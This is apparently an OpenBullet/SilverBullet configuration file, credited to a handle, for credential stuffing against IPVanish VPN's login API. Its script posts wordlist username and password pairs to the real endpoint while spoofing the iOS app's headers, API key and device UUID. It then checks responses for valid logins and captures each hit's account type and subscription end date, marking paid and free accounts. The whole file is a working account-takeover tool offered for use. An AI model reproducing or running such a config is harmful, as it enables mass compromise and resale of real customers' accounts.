[SETTINGS]
{
  "Name": "ipvanish api",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-01-10T18:55:21.1543179+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "ipvanish api",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#LOGIN REQUEST POST "https://api.ipvanish.com/api/v3/login" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\",\"os\":\"iOS_14_7_1\",\"api_key\":\"185f600f32cee535b0bef41ad77c1acd\",\"client\":\"IPVanishVPN_iOS_3.8.2_68351\",\"uuid\":\"7097177B-FCB9-47C2-8674-C974048F929F\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: api.ipvanish.com" 
  HEADER "Content-Type: application/json" 
  HEADER "Accept: */*" 
  HEADER "X-Client-Version: 3.8.2_68351" 
  HEADER "X-Platform-Version: 14_7_1" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-us" 
  HEADER "X-Api-Version: 3.1" 
  HEADER "Content-Length: 198" 
  HEADER "User-Agent: IPVanishVPN/68351 CFNetwork/1240.0.4 Darwin/20.6.0" 
  HEADER "X-Platform: iOS" 
  HEADER "X-Client: IPVanishVPN" 
  HEADER "Connection: close" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "1100" 
    KEY "The username or password provided is incorrect" 
    KEY "\"reason\":\"The username or password provided is incorrect\"}" 
  KEYCHAIN Success OR 
    KEY "{\"email\":\"" 
    KEY "Account Information" 

#account_type PARSE "<SOURCE>" LR "\"account_type\":" ",\"" CreateEmpty=FALSE -> CAP "Account Type" 

#c1 PARSE "<SOURCE>" LR "\"sub_end_epoch\":" ",\"" -> VAR "c1" 

#subs_end FUNCTION UnixTimeToDate "yyyy-MM-dd:HH-mm-ss" "<c1>" -> CAP "Subscription End" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<Account Type>" Contains "2" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Account Type>" Contains "1" 

